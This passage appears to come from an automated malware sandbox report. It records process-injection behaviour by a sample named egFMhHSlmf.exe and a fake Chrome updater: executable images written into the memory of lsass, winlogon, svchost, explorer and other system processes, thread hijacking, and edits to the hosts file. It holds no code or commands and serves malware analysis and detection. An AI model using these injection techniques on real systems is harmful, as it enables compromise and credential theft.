          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2820000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 700000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C90000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: D60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2A20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: B60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 14A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3130000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 900000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2C30000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 30F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 10B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 23D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2860000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2650000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 750000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1620000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2B80000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 15A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 24D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 12A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 6F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 25B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3070000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2980000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3110000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2150000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2910000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3140000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2CD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2AF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2360000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 3030000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 13D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2FC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1510000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 8B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: F70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 730000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E6AB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 217D6390000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D29E890000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28189530000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 146F6AD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1BF4B840000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 208BF760000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E40000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 23B50E70000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CCD9A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4004 base: 86A0000 value: 4D
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeThread register set: target process: 3084
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3820
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5952
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 6900
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 2248
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7080
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeFile written: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 10DAB2010
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B020000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA270000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E69A0000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F6E67F0000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 243975010
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B050000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA5B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6963C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FBADCF0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 40D0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BEDFE40000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FFD2D10000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B38FD50000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D8FD7A0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: EA0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2DD0000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2D20000
          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EA0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 2EB0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 26E0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 22C0000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1460000
          Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\wuqwgDeQKNTyvwCqPKGdCxDVwsLBTfflyEeEvlFFcGqywHwqHVTNboIHYJ\ZbdOtWCbFZADO.exe base: 1150000
